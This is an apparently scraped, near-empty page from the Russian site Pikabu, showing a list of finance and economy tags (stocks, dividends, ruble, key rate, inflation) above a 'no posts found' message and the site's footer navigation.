[моё] Фондовый рынок Биржа Инвестиции в акции Финансы Трейдинг Облигации Дивиденды Валюта Рубль Ключевая ставка Доллары Центральный банк РФ Акции Инвестиции Кризис Россия Экономика Новости Инфляция Текст
3
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии